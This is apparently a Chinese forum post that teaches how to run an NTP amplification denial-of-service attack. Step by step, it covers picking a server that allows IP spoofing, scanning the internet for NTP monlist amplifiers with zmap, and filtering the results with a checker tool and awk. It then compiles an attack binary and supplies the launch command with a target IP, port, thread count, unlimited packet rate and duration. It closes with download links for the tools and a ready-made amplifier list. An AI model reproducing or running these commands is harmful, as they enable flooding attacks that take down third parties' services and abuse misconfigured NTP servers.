金币2829
积分9866
注册时间2016-12-2
最后登录2024-12-4
|
你需要一台服务器,而且能欺骗的服务器,不是服务器都可以的。不能欺骗的服务器攻击是没有任何效果的
里面带有我昨天扫描的NTP列表,阿里 OVH都是不能欺骗的本人测试过。
更新您的服务器
安装repositorys
CentOS 6:
- wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
复制代码- sudo rpm -Uvh epel-release-6-8.noarch.rpm
复制代码
Centos 7:
- wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-8.noarch.rpm
复制代码- sudo rpm -Uvh epel-release-7-8.noarch.rpm
复制代码
安装依赖环境
- yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
复制代码 安装ZMAP
ntpchecker—上传到你的服务器
ntp_123_monlist.pkt—上传到你的服务器
开始扫描放大列表
- screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
复制代码
这个过程相当长的请等待,不想等的可以用我扫描的列表
给ntpchecker权限
运行检查
- screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
复制代码
过滤列表
- awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt
复制代码 编译与攻击
服务器终端和类型
- yum install gcc libcap libpcap libpcap-devel
复制代码
编译脚本
- gcc -lpthread ntp.c -lpcap -o ntp
复制代码
攻击命令:
- ./ntp 127.0.0.1 80 ntpamp.txt 1500 -1 100
复制代码 攻击命令解释
127.0.0.1=目标IP
80=攻击端口
ntpamp.txt=过滤后的放大列表
1500=线程
-1=pps限制,-1表示无限制
100=攻击时间
下载地址:
蓝奏网盘:https://pan.lanzou.com/785884
百度网盘:http://pan.baidu.com/s/1hrMvEYw
微云网盘:https://share.weiyun.com/a08bba9cccdaf20f66343f09fe862fb5
|
|